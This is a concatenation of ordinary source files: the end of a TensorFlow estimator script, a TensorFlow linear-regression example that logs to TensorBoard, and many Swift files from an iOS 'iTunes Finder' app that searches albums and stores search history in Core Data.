ev = regressor.evaluate(input_fn=get_input_fn(test_set, num_epochs=1, shuffle=False))
loss_score = ev["loss"]
print("Loss: {0:f}".format(loss_score))
print(ev)
    print('### End of operations ###')
if __name__ == "__main__":
tf.app.run()
<file_sep>/tf-simple-tensorboard.py
""" Simple linear regression example in TensorFlow
This program tries to predict the number of thefts from
the number of fires in the city of Chicago
Author: <NAME>
Prepared for the class CS 20SI: "TensorFlow for Deep Learning Research"
cs20si.stanford.edu
tensorboard --logdir
One variable 2 writer
https://github.com/tensorflow/tensorflow/issues/7089
"""
import os
# os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
import datetime
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import csv
import io
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.INFO)
print("Tensorflow version: " + tf.__version__)
print(datetime.date.today())
print(datetime.datetime.today().strftime('%Y-%m-%d-%H-%M'))
folderName = datetime.datetime.today().strftime('%Y-%m-%d-%H-%M')
print(folderName)
# exit(0)
DATA_FILE = './data/simple/fire.csv'
MODEL_FOLDER = './model/simple/' + folderName
SKIP_STEP = 10
print('debug: tensorboard --logdir ', MODEL_FOLDER)
# Step 1: read in data from the .xls file
'''
book = xlrd.open_workbook(DATA_FILE, encoding_override="utf-8")
sheet = book.sheet_by_index(0)
data = np.asarray([sheet.row_values(i) for i in range(1, sheet.nrows)])
n_samples = sheet.nrows - 1
'''
# reader = csv.reader(open(DATA_FILE, "rb"), delimiter=",")
# x = list(reader)
data = np.loadtxt(open(DATA_FILE, "rb"), delimiter=",", skiprows=1)
print(data)
n_samples = data.shape[0] - 1
print('Num of samples:', n_samples)
# exit(0)
'''
data = pd.read_csv(DATA_FILE)
print(data)
print(data.count)
print(data.shape[0])
n_samples = data.shape[0] - 1
print(n_samples)
'''
def gen_plot(d):
"""Create a pyplot plot and save to buffer."""
plt.figure()
plt.plot(d[:,0],d[:,1],'ro')
    plt.title("Points of interest")
buf = io.BytesIO()
plt.savefig(buf, format='png')
buf.seek(0)
return buf
# Step 2: create placeholders for input X (number of fires) and label Y (number of thefts)
with tf.name_scope("data_input"):
X = tf.placeholder(tf.float32, name='X')
Y = tf.placeholder(tf.float32, name='Y')
# Step 3: create weight and bias, initialized to 0
with tf.name_scope("data_input"):
w = tf.Variable(0.1, name='weights')
b = tf.Variable(0.1, name='bias')
# Step 4: build model to predict Y
Y_predicted = X * w + b
# Step 5: use the square error as the loss function
loss = tf.square(Y - Y_predicted, name='loss')
# loss = utils.huber_loss(Y, Y_predicted)
# Step 6: using gradient descent with learning rate of 0.01 to minimize loss
optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001).minimize(loss)
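The commented-out `utils.huber_loss` alternative below is not defined in this script. For reference, the Huber loss is quadratic for small residuals and linear for large ones, which makes it less sensitive to outliers than the plain squared error used here. A minimal NumPy sketch (the `delta` threshold of 1.0 is an assumed default, not taken from the missing `utils` module):

```python
import numpy as np

def huber_loss(labels, predictions, delta=1.0):
    """Quadratic below |residual| = delta, linear above it."""
    residual = np.abs(labels - predictions)
    small = 0.5 * residual ** 2                    # squared-error regime
    large = delta * residual - 0.5 * delta ** 2    # linear regime
    return np.where(residual <= delta, small, large)

print(huber_loss(0.0, 0.5))  # 0.125 (quadratic regime)
print(huber_loss(0.0, 2.0))  # 1.5   (linear regime)
```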
# definisce variabili per TB
tf.summary.scalar("normal/loss", loss)
tf.summary.scalar("normal/current_w", w)
tf.summary.scalar("normal/current_b", b)
plot_buf = gen_plot(data)
image = tf.image.decode_png(plot_buf.getvalue(), channels=4)
# Add the batch dimension
image = tf.expand_dims(image, 0)
print(image)
tf.summary.image("Example_images", image)
tf.summary.text('tag1', tf.convert_to_tensor('Tag1: Random Text 1'))
# salva il modello
saver = tf.train.Saver() # defaults to saving all variables
with tf.Session() as sess:
# Step 7: initialize the necessary variables, in this case, w and b
sess.run(tf.global_variables_initializer())
writer = tf.summary.FileWriter(MODEL_FOLDER, sess.graph)
summaries = tf.summary.merge_all()
# Step 8: train the model
    for index in range(500): # train the model for 500 epochs (re-runs the training loop over the same data each epoch)
total_loss = 0
for x, y in data:
# Session runs train_op and fetch values of loss
# print('feed {0}: {1}', x, y)
summary, _, l = sess.run([summaries, optimizer, loss], feed_dict={X: x, Y:y})
total_loss += l
# img1 = sess.run(image)
# print('Loss at step {}: {:5.1f}'.format(index, l))
# summary.value.add(tag="roc", simple_value = total_loss)
writer.add_summary(summary, global_step=index)
#if (index + 1) % SKIP_STEP == 0:
# print('Average loss at step {}: {:5.1f}'.format(index, total_loss / SKIP_STEP))
# total_loss = 0.0
# saver.save(sess, MODEL_FOLDER + '/chk-simple', index)
print('Epoch: {0}: total_loss/n_samples: {1}'.format(index, total_loss/n_samples))
# close the writer when you're done using it
writer.close()
# Step 9: output the values of w and b
w, b = sess.run([w, b])
# plot the results
print('Plotting the final result')
X, Y = data.T[0], data.T[1]
plt.plot(X, Y, 'bo', label='Real data')
plt.plot(X, X * w + b, 'r', label='Predicted data')
plt.legend()
plt.show()
print('Operations completed')
<file_sep>//
// AppDelegate.swift
// iTunes Finder
//
// Created by <NAME> on 25.12.2020.
//
import UIKit
@UIApplicationMain
class AppDelegate: UIResponder {
// MARK: - Properties
var window: UIWindow?
private lazy var tabBarController: UITabBarController = {
let searchViewController = SearchConfigurator.configure()
searchViewController.tabBarItem.title = "Search"
searchViewController.tabBarItem.image = UIImage(named: "ic-tab-search")
let searchHistoryViewController = SearchHistoryConfigurator.configure()
searchHistoryViewController.tabBarItem.title = "History"
searchHistoryViewController.tabBarItem.image = UIImage(named: "ic-tab-history")
let tabBarController = UITabBarController()
tabBarController.viewControllers = [searchViewController, searchHistoryViewController]
tabBarController.view.tintColor = .systemPink
return tabBarController
}()
// MARK: - Methods
// Sets root UIViewController in the window.
private func setRootViewController() {
let window = UIWindow(frame: UIScreen.main.bounds)
window.rootViewController = tabBarController
window.makeKeyAndVisible()
self.window = window
}
}
// MARK: - UIApplicationDelegate
extension AppDelegate: UIApplicationDelegate {
func application(_ application: UIApplication, didFinishLaunchingWithOptions launchOptions: [UIApplication.LaunchOptionsKey: Any]?) -> Bool {
setRootViewController()
return true
}
}
<file_sep>//
// UIFont+Traits.swift
// iTunes Finder
//
// Created by <NAME> on 27.12.2020.
//
import UIKit
extension UIFont {
// MARK: - Public Methods
// Applies a bold font style.
func bold() -> UIFont {
return self.withSymbolicTraits(.traitBold)
}
// Applies an italic font style.
func italic() -> UIFont {
return self.withSymbolicTraits(.traitItalic)
}
// MARK: - Private Methods
// Takes the font we are extending and applies the specified traits to it.
// The size parameter in returning UIFont is set to zero, which means
// don’t change the font size from what it currently is.
private func withSymbolicTraits(_ symbolicTraits: UIFontDescriptor.SymbolicTraits) -> UIFont {
guard let fontDescriptor = fontDescriptor.withSymbolicTraits(symbolicTraits) else { return self }
let font = UIFont(descriptor: fontDescriptor, size: .zero)
return font
}
}
<file_sep>//
// SearchHistoryPresenter.swift
// iTunes Finder
//
// Created by <NAME> on 25.12.2020.
//
import UIKit
import CoreData
protocol SearchHistoryViewProtocol: AnyObject {
func tableView(shouldSetUpdates state: Bool)
func tableView(shouldInsertRowsAt indexPath: [IndexPath])
func tableView(shouldMoveRowAt indexPath: IndexPath, to newIndexPath: IndexPath)
func tableView(shouldReloadRowsAt indexPath: [IndexPath])
func tableView(shouldDeleteRowsAt indexPath: [IndexPath])
}
protocol SearchHistoryPresenterProtocol {
init(view: SearchHistoryViewProtocol, router: SearchHistoryRouterProtocol)
func moveToSearchDetail(with album: Album)
}
final class SearchHistoryPresenter: NSObject, SearchHistoryPresenterProtocol {
// MARK: - Properties
private weak var view: SearchHistoryViewProtocol?
private let router: SearchHistoryRouterProtocol
private lazy var fetchedResultsController: NSFetchedResultsController<SearchItem> = {
let context = CoreDataStack.shared.viewContext
let fetchRequest: NSFetchRequest<SearchItem> = SearchItem.fetchRequest()
fetchRequest.fetchBatchSize = 24
let sortByCreatedDate = NSSortDescriptor(key: "createdDate", ascending: false)
fetchRequest.sortDescriptors = [sortByCreatedDate]
let fetchedResultsController = NSFetchedResultsController(fetchRequest: fetchRequest, managedObjectContext: context, sectionNameKeyPath: nil, cacheName: nil)
fetchedResultsController.delegate = self
do {
try fetchedResultsController.performFetch()
} catch let error {
print("Unable to fetch data: \(error.localizedDescription)")
}
return fetchedResultsController
}()
// MARK: - Initializers
init(view: SearchHistoryViewProtocol, router: SearchHistoryRouterProtocol) {
self.view = view
self.router = router
}
// MARK: - Methods
// Moves to the SearchDetail module.
func moveToSearchDetail(with album: Album) {
router.moveToSearchDetail(with: album)
}
}
// MARK: - UITableView Data Source
extension SearchHistoryPresenter: UITableViewDataSource {
func tableView(_ tableView: UITableView, numberOfRowsInSection section: Int) -> Int {
if let searchItems = fetchedResultsController.fetchedObjects {
return searchItems.count
}
return 0
}
func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell {
guard let cell = tableView.dequeueReusableCell(withIdentifier: SearchHistoryTableViewCell.identifier, for: indexPath) as? SearchHistoryTableViewCell else { return UITableViewCell() }
let model = fetchedResultsController.object(at: indexPath)
cell.configure(with: model)
return cell
}
}
// MARK: - UITableView Delegate
extension SearchHistoryPresenter: UITableViewDelegate {
func tableView(_ tableView: UITableView, didSelectRowAt indexPath: IndexPath) {
let searchItem = fetchedResultsController.object(at: indexPath)
if let query = searchItem.query {
router.moveToSearchResults(with: query)
}
tableView.deselectRow(at: indexPath, animated: true)
}
}
// MARK: - NSFetchedResultsController Delegate
extension SearchHistoryPresenter: NSFetchedResultsControllerDelegate {
func controllerWillChangeContent(_ controller: NSFetchedResultsController<NSFetchRequestResult>) {
view?.tableView(shouldSetUpdates: true)
}
func controller(_ controller: NSFetchedResultsController<NSFetchRequestResult>, didChange anObject: Any, at indexPath: IndexPath?, for type: NSFetchedResultsChangeType, newIndexPath: IndexPath?) {
switch type {
case .insert:
if let newIndexPath = newIndexPath {
view?.tableView(shouldInsertRowsAt: [newIndexPath])
}
case .move:
if let indexPath = indexPath, let newIndexPath = newIndexPath {
view?.tableView(shouldMoveRowAt: indexPath, to: newIndexPath)
}
case .update:
if let indexPath = indexPath {
view?.tableView(shouldReloadRowsAt: [indexPath])
}
case .delete:
if let indexPath = indexPath {
view?.tableView(shouldDeleteRowsAt: [indexPath])
}
default:
break
}
}
func controllerDidChangeContent(_ controller: NSFetchedResultsController<NSFetchRequestResult>) {
view?.tableView(shouldSetUpdates: false)
}
}
<file_sep>//
// SearchDetailViewController.swift
// iTunes Finder
//
// Created by <NAME> on 30.12.2020.
//
import UIKit
final class SearchDetailViewController: UIViewController {
// MARK: - Public Properties
var presenter: SearchDetailPresenterProtocol?
// MARK: - Private Properties
private lazy var tableView: UITableView = {
let tableView = UITableView(frame: .zero, style: .grouped)
tableView.alpha = 0
tableView.register(AlbumTableViewHeader.self, forHeaderFooterViewReuseIdentifier: AlbumTableViewHeader.identifier)
tableView.register(SongTableViewCell.self, forCellReuseIdentifier: SongTableViewCell.identifier)
tableView.translatesAutoresizingMaskIntoConstraints = false
tableView.allowsSelection = false
if #available(iOS 13.0, *) {
tableView.backgroundColor = .systemBackground
} else {
tableView.backgroundColor = .white
}
tableView.dataSource = presenter as? UITableViewDataSource
tableView.delegate = presenter as? UITableViewDelegate
return tableView
}()
private lazy var activityIndicatorView: UIActivityIndicatorView = {
let activityIndicatorView = UIActivityIndicatorView()
activityIndicatorView.startAnimating()
activityIndicatorView.hidesWhenStopped = true
activityIndicatorView.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
activityIndicatorView.style = .large
} else {
activityIndicatorView.style = .gray
}
return activityIndicatorView
}()
// MARK: - UIViewController Events
override func viewDidLoad() {
super.viewDidLoad()
configureVisualAppearance()
configureViews()
presenter?.fetchSongs()
}
}
// MARK: - Visual Appearance
extension SearchDetailViewController {
// Groups all methods that are configuring the view’s visual appearance.
private func configureVisualAppearance() {
configureColors()
configureNavigationTitle()
}
// Configures colors.
private func configureColors() {
// Setting up .systemBackground for the view's backgroundColor
// to support dark theme in iOS 13 or newer
if #available(iOS 13.0, *) {
self.view.backgroundColor = .systemBackground
} else {
self.view.backgroundColor = .white
}
self.view.tintColor = .systemPink
}
// Configures a title in the navigation bar.
private func configureNavigationTitle() {
self.navigationItem.title = "Album Info"
self.navigationItem.largeTitleDisplayMode = .never
}
}
// MARK: - Layout
extension SearchDetailViewController {
// Groups all methods that are configuring the view.
private func configureViews() {
configureActivityIndicatorView()
configureTableView()
}
// Configures an activity indicator to display loading process.
private func configureActivityIndicatorView() {
self.view.addSubview(activityIndicatorView)
// Setting up constraints
activityIndicatorView.centerXToSuperview()
activityIndicatorView.centerYToSuperview()
}
// Configures a table view to display search history.
private func configureTableView() {
self.view.addSubview(tableView)
// Setting up constraints
tableView.horizontalToSuperview()
tableView.verticalToSuperview(usingSafeArea: true)
}
}
// MARK: - SearchDetailPresenter Delegate
extension SearchDetailViewController: SearchDetailViewProtocol {
// Reloads the table view with a new data.
func shouldReloadData() {
DispatchQueue.main.async { [weak self] in
self?.tableView.reloadData()
// Animating presentation of the table view
UIView.animate(withDuration: 0.25, delay: 0.25, options: .curveEaseInOut) {
self?.tableView.alpha = 1
} completion: { _ in
self?.activityIndicatorView.stopAnimating()
}
}
}
}
<file_sep>//
// Database.swift
// iTunes Finder
//
// Created by <NAME> on 28.12.2020.
//
import Foundation
final class Database {
// MARK: - Properties
static let shared = Database()
// MARK: - Methods
// Saves a search query to Core Data.
func save(query: String) {
CoreDataStack.shared.save { context in
let createdDate = Date()
_ = SearchItem(query: query, createdDate: createdDate, context: context)
}
}
}
<file_sep>//
// SearchResultsPresenter.swift
// iTunes Finder
//
// Created by <NAME> on 30.12.2020.
//
import UIKit
protocol SearchResultsViewProtocol: AnyObject {
func shouldReloadData()
func shouldPresent(album: Album)
}
protocol SearchResultsPresenterProtocol {
init(view: SearchResultsViewProtocol, router: SearchResultsRouterProtocol)
}
final class SearchResultsPresenter: NSObject, SearchResultsPresenterProtocol {
// MARK: - Properties
private weak var view: SearchResultsViewProtocol?
private let router: SearchResultsRouterProtocol
private let throttler = Throttler(delay: 0.5)
private var albums: [Album] = [] {
didSet {
view?.shouldReloadData()
}
}
// MARK: - Initializers
init(view: SearchResultsViewProtocol, router: SearchResultsRouterProtocol) {
self.view = view
self.router = router
}
convenience init(view: SearchResultsViewProtocol, router: SearchResultsRouterProtocol, query: String) {
self.init(view: view, router: router)
search(text: query)
}
// MARK: - Methods
    // Sends a delayed search query and displays the new data in the collection.
func search(text query: String) {
throttler.throttle { [weak self] in
Database.shared.save(query: query)
DataProvider.shared.get(albumsWithName: query) { result in
switch result {
case .success(let albums):
// Setting albums sorted by release date
self?.albums = albums.sorted { (a, b) -> Bool in
return a.releaseDate > b.releaseDate
}
case .failure(let error):
// Presenting an error message if something went wrong
DispatchQueue.main.async {
self?.router.presentAlert(title: "Error", message: error.localizedDescription)
}
}
}
}
}
}
// MARK: - UICollectionView Data Source
extension SearchResultsPresenter: UICollectionViewDataSource {
func collectionView(_ collectionView: UICollectionView, numberOfItemsInSection section: Int) -> Int {
return albums.count
}
func collectionView(_ collectionView: UICollectionView, cellForItemAt indexPath: IndexPath) -> UICollectionViewCell {
guard let cell = collectionView.dequeueReusableCell(withReuseIdentifier: AlbumCollectionViewCell.identifier, for: indexPath) as? AlbumCollectionViewCell else { return UICollectionViewCell() }
// Configuring the cell with data from the model
let album = albums[indexPath.row]
cell.configure(with: album)
return cell
}
}
// MARK: - UICollectionView Delegate Flow Layout
extension SearchResultsPresenter: UICollectionViewDelegateFlowLayout {
func collectionView(_ collectionView: UICollectionView, layout collectionViewLayout: UICollectionViewLayout, sizeForItemAt indexPath: IndexPath) -> CGSize {
guard let collectionViewLayout = collectionView.collectionViewLayout as? UICollectionViewFlowLayout else { return CGSize(width: 50, height: 50) }
// Getting collection view's layout insets
let sectionInsets = collectionViewLayout.sectionInset.left + collectionViewLayout.sectionInset.right
let interitemSpacing = collectionViewLayout.minimumInteritemSpacing
let insets = sectionInsets + interitemSpacing
        // Calculates the cell size so that 2 cells fit in a single row
let viewWidth = collectionView.bounds.size.width
let estimatedItemSize = (viewWidth - insets) / 2
let size = CGSize(width: estimatedItemSize, height: estimatedItemSize)
return size
}
func collectionView(_ collectionView: UICollectionView, didSelectItemAt indexPath: IndexPath) {
// Presents a SearchDetail module with the selected album
let album = albums[indexPath.row]
view?.shouldPresent(album: album)
}
}
// MARK: - UISearchResultsUpdating
extension SearchResultsPresenter: UISearchResultsUpdating {
func updateSearchResults(for searchController: UISearchController) {
guard let query = searchController.searchBar.text, query.isNotEmpty else { return }
search(text: query)
}
}
<file_sep>//
// SearchItem+Init.swift
// iTunes Finder
//
// Created by <NAME> on 30.12.2020.
//
import CoreData
extension SearchItem {
    // Convenience initializer that sets all required properties and inserts the object into the given context.
convenience init(query: String, createdDate: Date, context: NSManagedObjectContext) {
self.init(context: context)
self.query = query
self.createdDate = createdDate
}
}
<file_sep>//
// String+Validation.swift
// iTunes Finder
//
// Created by <NAME> on 30.12.2020.
//
import Foundation
extension String {
    // Indicates whether the string contains any non-whitespace characters.
    var isNotEmpty: Bool {
        return !trimmingCharacters(in: .whitespacesAndNewlines).isEmpty
    }
}
<file_sep>//
// SearchDetailRouter.swift
// iTunes Finder
//
// Created by <NAME> on 30.12.2020.
//
import UIKit
protocol SearchDetailRouterProtocol {
init(view: UIViewController)
func presentAlert(title: String, message: String)
}
final class SearchDetailRouter: SearchDetailRouterProtocol {
// MARK: - Properties
private weak var view: UIViewController?
// MARK: - Initializers
init(view: UIViewController) {
self.view = view
}
// MARK: - Methods
// Presents an alert with title and message.
func presentAlert(title: String, message: String) {
guard let view = view as? SearchDetailViewController else { return }
let action = UIAlertAction(title: "Done", style: .default)
let alertController = UIAlertController(title: title, message: message, preferredStyle: .alert)
alertController.addAction(action)
view.present(alertController, animated: true)
}
}
<file_sep>//
// SearchDetailConfigurator.swift
// iTunes Finder
//
// Created by <NAME> on 30.12.2020.
//
import UIKit
final class SearchDetailConfigurator {
static func configure(with album: Album) -> UIViewController {
let view = SearchDetailViewController()
let router = SearchDetailRouter(view: view)
let presenter = SearchDetailPresenter(view: view, router: router, album: album)
view.presenter = presenter
return view
}
}
<file_sep>//
// PlaceholderView.swift
// iTunes Finder
//
// Created by <NAME> on 27.12.2020.
//
import UIKit
final class PlaceholderView: UIView {
// MARK: - Properties
private let imageView: UIImageView = {
let imageView = UIImageView()
imageView.contentMode = .scaleAspectFit
imageView.translatesAutoresizingMaskIntoConstraints = false
return imageView
}()
private let titleLabel: UILabel = {
let titleLabel = UILabel()
titleLabel.font = UIFont.preferredFont(forTextStyle: .title2).bold()
titleLabel.textAlignment = .center
titleLabel.numberOfLines = 1
titleLabel.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
titleLabel.textColor = .label
} else {
titleLabel.textColor = .black
}
return titleLabel
}()
private let subtitleLabel: UILabel = {
let subtitleLabel = UILabel()
subtitleLabel.font = .preferredFont(forTextStyle: .body)
subtitleLabel.textAlignment = .center
subtitleLabel.numberOfLines = 3
subtitleLabel.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
subtitleLabel.textColor = .label
} else {
subtitleLabel.textColor = .black
}
return subtitleLabel
}()
// MARK: - Initializers
override init(frame: CGRect) {
super.init(frame: frame)
configureViews()
}
required init?(coder: NSCoder) {
super.init(coder: coder)
configureViews()
}
    convenience init(image: UIImage?, title: String, subtitle: String) {
        self.init(frame: .zero)
        self.imageView.image = image
        self.titleLabel.text = title
        self.subtitleLabel.text = subtitle
    }
// MARK: - Layout
// Groups all methods that are configuring the view.
private func configureViews() {
configureTitleLabel()
configureSubtitleLabel()
configureImageView()
}
// Configures a label with placeholder title.
private func configureTitleLabel() {
self.addSubview(titleLabel)
// Setting up constraints
titleLabel.centerYToSuperview()
titleLabel.horizontalToSuperview(insets: .horizontal(32))
}
// Configures a label with placeholder subtitle.
private func configureSubtitleLabel() {
self.addSubview(subtitleLabel)
// Setting up constraints
subtitleLabel.topToBottom(of: titleLabel, offset: 8)
subtitleLabel.horizontalToSuperview(insets: .horizontal(32))
}
// Configures an image view for placeholder image.
private func configureImageView() {
self.addSubview(imageView)
// Setting up constraints
imageView.horizontalToSuperview(insets: .horizontal(32))
imageView.bottomToTop(of: titleLabel, offset: -16)
imageView.aspectRatio(2 / 1)
}
}
<file_sep>//
// SearchViewController.swift
// iTunes Finder
//
// Created by <NAME> on 25.12.2020.
//
import UIKit
import TinyConstraints
final class SearchViewController: UIViewController {
// MARK: - Public Properties
var presenter: SearchPresenterProtocol?
// MARK: - Private Properties
private lazy var placeholderView: PlaceholderView = {
let image = UIImage(named: "search-placeholder")
let title = "What're you looking for?"
        let subtitle = "Search the iTunes database"
let placeholderView = PlaceholderView(image: image, title: title, subtitle: subtitle)
if #available(iOS 13.0, *) {
placeholderView.backgroundColor = .systemBackground
} else {
placeholderView.backgroundColor = .white
}
return placeholderView
}()
// MARK: - UIViewController Events
override func viewDidLoad() {
super.viewDidLoad()
configureVisualAppearance()
configureViews()
}
}
// MARK: - Visual Appearance
extension SearchViewController {
// Groups all methods that are configuring the view’s visual appearance.
private func configureVisualAppearance() {
configureColors()
configureNavigationTitle()
}
// Configures colors.
private func configureColors() {
// Setting up .systemBackground for the view's backgroundColor
// to support dark theme in iOS 13 or newer
if #available(iOS 13.0, *) {
self.view.backgroundColor = .systemBackground
} else {
self.view.backgroundColor = .white
}
self.view.tintColor = .systemPink
}
// Configures a title in the navigation bar.
private func configureNavigationTitle() {
        // Ask the navigation bar to display the title using a larger font when possible
        navigationController?.navigationBar.prefersLargeTitles = true
self.navigationItem.title = "Search"
}
}
// MARK: - Layout
extension SearchViewController {
// Groups all methods that are configuring the view.
private func configureViews() {
configureSearchBar()
configurePlaceholderView()
}
// Configures a search bar in the navigation bar.
private func configureSearchBar() {
// Setting up the search controller with the search results controller
guard let searchResultsController = SearchResultsConfigurator.configure() as? SearchResultsViewController else { return }
searchResultsController.delegate = self
let searchController = UISearchController(searchResultsController: searchResultsController)
searchController.searchResultsUpdater = searchResultsController.presenter as? UISearchResultsUpdating
// Setting up the search bar
searchController.searchBar.autocapitalizationType = .words
searchController.searchBar.placeholder = "Artists, songs, or albums"
searchController.searchBar.tintColor = .systemPink
self.navigationItem.searchController = searchController
self.navigationItem.hidesSearchBarWhenScrolling = false
}
// Configures a placeholder view.
private func configurePlaceholderView() {
self.view.addSubview(placeholderView)
// Setting up constraints
placeholderView.horizontalToSuperview()
placeholderView.verticalToSuperview()
}
}
// MARK: - SearchPresenter Delegate
extension SearchViewController: SearchViewProtocol {}
// MARK: - SearchResultsViewController Delegate
extension SearchViewController: SearchResultsViewControllerDelegate {
    // Asks the presenter to move to the SearchDetail module.
func searchResults(didSelect album: Album) {
presenter?.moveToSearchDetail(with: album)
}
}
<file_sep>//
// SearchRouter.swift
// iTunes Finder
//
// Created by <NAME> on 25.12.2020.
//
import UIKit
protocol SearchRouterProtocol {
init(view: UIViewController)
func moveToSearchDetail(with album: Album)
}
final class SearchRouter: SearchRouterProtocol {
// MARK: - Properties
private weak var view: UIViewController?
// MARK: - Initializers
init(view: UIViewController) {
self.view = view
}
// MARK: - Methods
// Moves view to a SearchDetail module.
func moveToSearchDetail(with album: Album) {
guard let view = view, let navigationController = view.navigationController else { return }
let viewController = SearchDetailConfigurator.configure(with: album)
navigationController.pushViewController(viewController, animated: true)
}
}
<file_sep>//
// SongTableViewCell.swift
// iTunes Finder
//
// Created by <NAME> on 30.12.2020.
//
import UIKit
final class SongTableViewCell: UITableViewCell, ConfigurableView {
// MARK: - Public Properties
static let identifier = "SongTableViewCell"
// MARK: - Private Properties
private let nameLabel: UILabel = {
let nameLabel = UILabel()
nameLabel.font = UIFont.preferredFont(forTextStyle: .body)
nameLabel.numberOfLines = 1
nameLabel.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
nameLabel.textColor = .label
} else {
nameLabel.textColor = .black
}
return nameLabel
}()
// MARK: - Initializers
override init(style: UITableViewCell.CellStyle, reuseIdentifier: String?) {
super.init(style: style, reuseIdentifier: reuseIdentifier)
configureViews()
}
required init?(coder: NSCoder) {
super.init(coder: coder)
configureViews()
}
// MARK: - Public Methods
// Configures a cell with data from a model.
func configure(with model: Song) {
nameLabel.text = model.name
}
// MARK: - Layout
// Groups all methods that are configuring the view.
private func configureViews() {
configureNameLabel()
}
// Configures a label.
private func configureNameLabel() {
        self.contentView.addSubview(nameLabel)
// Setting up constraints
nameLabel.centerYToSuperview()
nameLabel.horizontalToSuperview(insets: .horizontal(20))
}
}
<file_sep>//
// AlbumTableViewHeader.swift
// iTunes Finder
//
// Created by <NAME> on 30.12.2020.
//
import UIKit
import Nuke
import TinyConstraints
final class AlbumTableViewHeader: UITableViewHeaderFooterView, ConfigurableView {
// MARK: - Public Properties
static let identifier = "AlbumTableViewHeader"
// MARK: - Private Properties
private let artworkImageView: UIImageView = {
let artworkImageView = UIImageView()
artworkImageView.contentMode = .scaleAspectFit
artworkImageView.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
artworkImageView.backgroundColor = .systemGray6
} else {
artworkImageView.backgroundColor = UIColor(red: 0.95, green: 0.95, blue: 0.97, alpha: 1.00)
}
return artworkImageView
}()
private let activityIndicatorView: UIActivityIndicatorView = {
let activityIndicatorView = UIActivityIndicatorView()
activityIndicatorView.startAnimating()
activityIndicatorView.hidesWhenStopped = true
activityIndicatorView.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
activityIndicatorView.style = .medium
} else {
activityIndicatorView.style = .gray
}
return activityIndicatorView
}()
private let nameLabel: UILabel = {
let nameLabel = UILabel()
nameLabel.font = UIFont.preferredFont(forTextStyle: .title1).bold()
nameLabel.numberOfLines = 2
nameLabel.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
nameLabel.textColor = .label
} else {
nameLabel.textColor = .black
}
return nameLabel
}()
private let artistNameLabel: UILabel = {
let artistNameLabel = UILabel()
artistNameLabel.font = UIFont.preferredFont(forTextStyle: .body)
artistNameLabel.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
artistNameLabel.textColor = .label
} else {
artistNameLabel.textColor = .black
}
return artistNameLabel
}()
private let priceLabel: UILabel = {
let priceLabel = UILabel()
priceLabel.font = UIFont.preferredFont(forTextStyle: .footnote)
priceLabel.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
priceLabel.textColor = .secondaryLabel
} else {
priceLabel.textColor = .gray
}
return priceLabel
}()
private let currencyLabel: UILabel = {
let currencyLabel = UILabel()
currencyLabel.font = UIFont.preferredFont(forTextStyle: .footnote)
currencyLabel.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
currencyLabel.textColor = .secondaryLabel
} else {
currencyLabel.textColor = .gray
}
return currencyLabel
}()
// MARK: - Initializers
override init(reuseIdentifier: String?) {
super.init(reuseIdentifier: reuseIdentifier)
configureViews()
}
required init?(coder: NSCoder) {
super.init(coder: coder)
configureViews()
}
// MARK: - Public Methods
// Configures a cell with data from a model.
func configure(with model: Album) {
// Loading an album artwork image
if let url = URL(string: model.artworkUrl) {
let options = ImageLoadingOptions(transition: .fadeIn(duration: 0.33))
Nuke.loadImage(with: url, options: options, into: artworkImageView) { [weak self] _ in
self?.activityIndicatorView.stopAnimating()
}
}
// Setting content
nameLabel.text = model.name
artistNameLabel.text = model.artistName
priceLabel.text = model.price
currencyLabel.text = model.currency
}
// MARK: - Layout
// Groups all methods that are configuring the view.
private func configureViews() {
configureContentView()
configureArtworkImageView()
configureActivityIndicatorView()
configureNameLabel()
configureArtistNameLabel()
configurePriceView()
}
// Configures a content view.
private func configureContentView() {
self.contentView.verticalToSuperview()
self.contentView.horizontalToSuperview()
}
// Configures an image view for an album artwork image.
private func configureArtworkImageView() {
self.contentView.addSubview(artworkImageView)
// Setting up constraints
self.contentView.top(to: artworkImageView, offset: -20)
artworkImageView.leftToSuperview(offset: 20)
artworkImageView.widthToSuperview(multiplier: 0.5)
artworkImageView.aspectRatio(1)
}
// Configures an activity indicator to display an image loading process.
private func configureActivityIndicatorView() {
self.contentView.addSubview(activityIndicatorView)
// Setting up constraints
activityIndicatorView.centerX(to: artworkImageView)
activityIndicatorView.centerY(to: artworkImageView)
}
// Configures a label to display an album name.
private func configureNameLabel() {
self.contentView.addSubview(nameLabel)
// Setting up constraints
nameLabel.topToBottom(of: artworkImageView, offset: 16)
nameLabel.horizontalToSuperview(insets: .horizontal(20))
}
// Configures a label to display an artist name of the album.
private func configureArtistNameLabel() {
self.contentView.addSubview(artistNameLabel)
// Setting up constraints
artistNameLabel.topToBottom(of: nameLabel, offset: 8)
artistNameLabel.horizontalToSuperview(insets: .horizontal(20))
}
// Configures a view to display an album price.
private func configurePriceView() {
// Creating a Stack View for placing a price labels
let priceStackView = UIStackView()
priceStackView.axis = .horizontal
priceStackView.alignment = .center
priceStackView.distribution = .fill
priceStackView.spacing = 4
priceStackView.translatesAutoresizingMaskIntoConstraints = false
self.contentView.addSubview(priceStackView)
// Placing labels in the Stack View
priceStackView.addArrangedSubview(priceLabel)
priceStackView.addArrangedSubview(currencyLabel)
// Setting up constraints
priceLabel.setContentHuggingPriority(.defaultHigh, for: .horizontal)
currencyLabel.setContentHuggingPriority(.defaultLow, for: .horizontal)
priceStackView.topToBottom(of: artistNameLabel, offset: 8)
priceStackView.horizontalToSuperview(insets: .horizontal(20))
self.contentView.bottom(to: priceStackView, offset: 16)
}
}
<file_sep>//
// SearchConfigurator.swift
// iTunes Finder
//
